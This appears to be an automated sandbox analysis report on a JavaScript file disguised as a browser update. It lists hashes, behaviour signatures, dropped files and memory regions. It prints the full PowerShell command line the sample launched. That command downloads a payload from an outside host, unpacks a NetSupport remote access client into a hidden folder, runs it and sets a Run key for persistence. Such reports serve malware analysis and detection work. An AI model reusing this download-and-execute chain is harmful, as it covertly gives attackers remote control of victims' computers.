Analysis

  • max time kernel
    1594s
  • max time network
    1797s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/01/2024, 20:01

General

  • Target

    Update_browser_17.6436.js

  • Size

    296KB

  • MD5

    fd24b53547b889be132aa98a7f193614

  • SHA1

    c5331d01d1149e8b5846d076afaa3f60f5458f99

  • SHA256

    d8f2134faeed8cf62887aaad8403ab7f29b5cd26cd03b81cb59774442d97fc0e

  • SHA512

    54995b6a818f870655cd33b2b4cdf1185cdfbb91ecf6c8217834ec454041039a4defd7c178851ac11bc32d61d08dd92a2a6207ce90071d2d7987019ae9074c79

  • SSDEEP

    3072:4OpyDJu8XUtQQSO1T7cbF/nlz3wq2BOOpyDJu8XUtQQSO1T7cbF/nlz3wq2Bp:lcJ6QhO1T7cZd6BvcJ6QhO1T7cZd6Bp

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://boxtechcompany.com/data.php?8317

exe.dropper

https://boxtechcompany.com/data.php?8317

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Update_browser_17.6436.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4152
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $GsgjmxNfEQdrqJYxQSDVvRpGZu='https://boxtechcompany.com/data.php?8317';$zhqeDTwNVYWLwoIAiIUYqEoUvYDrw=(New-Object System.Net.WebClient).DownloadString($GsgjmxNfEQdrqJYxQSDVvRpGZu);$NQevOZpukEtrdJAHxPHwhdLsdAMMVwYh=[System.Convert]::FromBase64String($zhqeDTwNVYWLwoIAiIUYqEoUvYDrw);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $PKPVlIPDbsJXusApGbSNeAO=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $PKPVlIPDbsJXusApGbSNeAO -PathType Container)) { New-Item -Path $PKPVlIPDbsJXusApGbSNeAO -ItemType Directory };$p=Join-Path $PKPVlIPDbsJXusApGbSNeAO 'vib.zip';[System.IO.File]::WriteAllBytes($p,$NQevOZpukEtrdJAHxPHwhdLsdAMMVwYh);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$PKPVlIPDbsJXusApGbSNeAO)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $PKPVlIPDbsJXusApGbSNeAO 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $PKPVlIPDbsJXusApGbSNeAO -Force; $FSDFSSD.attributes='Hidden';$s=$PKPVlIPDbsJXusApGbSNeAO+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Users\Admin\AppData\Roaming\DIVX192\client32.exe
        "C:\Users\Admin\AppData\Roaming\DIVX192\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1152

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3hfv0ac.okk.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\DIVX192\client32.exe

    Filesize

    101KB

    MD5

    c4f1b50e3111d29774f7525039ff7086

    SHA1

    57539c95cba0986ec8df0fcdea433e7c71b724c6

    SHA256

    18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

    SHA512

    005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

  • C:\Users\Admin\AppData\Roaming\DIVX192\client32.exe

    Filesize

    92KB

    MD5

    56c7af2760c6979dc064a921e1669358

    SHA1

    e879aecf30241468769e9206fa0d543f31d1be18

    SHA256

    a6f2fefeeb992008a2ff1f6781e4656820b905ec473648b08b8a129fab026438

    SHA512

    f5803eb2fe1f1c7ee9c72baadf9b5911c807bfdc161d4dc5cc6accd8603459bf0bf65bf700f7be3ca6083957c8357340890b32ab392803fcb1be9a56eb64389d

  • memory/3004-0-0x0000020E61CF0000-0x0000020E61D12000-memory.dmp

    Filesize

    136KB

  • memory/3004-12-0x0000020E617B0000-0x0000020E617C0000-memory.dmp

    Filesize

    64KB

  • memory/3004-11-0x0000020E617B0000-0x0000020E617C0000-memory.dmp

    Filesize

    64KB

  • memory/3004-10-0x00007FFB0D390000-0x00007FFB0DE51000-memory.dmp

    Filesize

    10.8MB

  • memory/3004-15-0x0000020E7C300000-0x0000020E7C312000-memory.dmp

    Filesize

    72KB

  • memory/3004-14-0x0000020E7C2D0000-0x0000020E7C2DA000-memory.dmp

    Filesize

    40KB

  • memory/3004-82-0x00007FFB0D390000-0x00007FFB0DE51000-memory.dmp

    Filesize

    10.8MB